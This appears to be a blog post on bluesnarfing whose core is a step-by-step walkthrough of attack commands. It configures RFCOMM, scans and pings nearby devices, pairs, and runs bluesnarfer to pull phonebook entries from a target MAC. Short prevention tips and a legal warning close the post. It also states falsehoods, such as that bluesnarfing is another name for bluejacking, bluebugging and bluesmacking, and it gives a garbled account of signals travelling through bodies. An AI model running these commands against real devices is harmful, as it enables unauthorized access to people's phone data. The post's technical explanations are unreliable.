Bluesnarfing is a mobile security threat where someone can access the data stored on your Bluetooth-enabled device without permission.

How Does Bluesnarfing Work?

Bluesnarfing works by tricking devices into pairing with each other so that they can exchange information without anyone knowing about it. This happens when two devices are close together and both have their Bluetooth turned on; one is sending signals through airwaves while the other receives them.

The problem is that these signals don’t just pass through walls; they also travel through bodies like ours—meaning people tend not to notice them when they’re on our bodies!

How to Bluesnarf ?

First we need to prepare our system and create a new device to allow the serial protocol over Bluetooth (RFCOMM).

Put the Bluetooth interface down and configure the rf channels.

Step 1 – Configure RFCOMM communication

hciconfig hci0 down
mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/rfcomm0 c 216 0

When you’re done, you’ll have a new RFCOMM channel open in your interface. Now we need to bring our interface up again and verify the settings.

hciconfig hci0 up
hciconfig hci0

Step 2 – Scan Bluetooth Classic devices

Let’s scan the device:

hcitool -i hci0 scan
hcitool inq
systemctl restart bluetooth

Step 3 – Test Bluetooth connectivity

Let’s test if we can reach our Bluetooth device using l2ping tool.

l2ping <MAC>

Step 4 – Read Remote Device Information

sdptool browse --tree --l2cap <MAC>

Step 5 – Pair with the remote Device

bluetoothctl agent on
bluetoothctl pair <MAC>

Step 6 – Attack the Bluetooth device

bluesnarfer -r 1-100 ME -C 7 -b <MAC>

Bluesnar is also known as Bluejacking, Bluebiting, Bluesmacking and Bluebugging which refer to the act of connecting to another user’s phone remotely using their phone’s Bluetooth function (Bluetooth).

Prevention Measures

  • Keep Bluetooth-enabled devices updated with the latest firmware and security patches to mitigate known vulnerabilities.
  • Disable Bluetooth when not in use or set devices to “non-discoverable” mode to reduce the risk of detection by attackers.
  • Implement strong authentication mechanisms, such as PINs or passwords, to prevent unauthorized access to Bluetooth devices.
  • Be cautious when pairing Bluetooth devices with unknown or untrusted devices, as this could expose them to potential attacks.

Bluesnarfing is illegal in many jurisdictions under various computer crime laws, as it involves unauthorized access to electronic devices and data theft. Perpetrators of Bluesnarf attacks may face legal consequences, including fines and imprisonment.


It involves gaining remote access by exploiting vulnerabilities in software or hardware that permits remote access via Bluetooth connections between devices (such as smartphones) and computers/laptops.


Categorized in:

Bluetooth Hacking,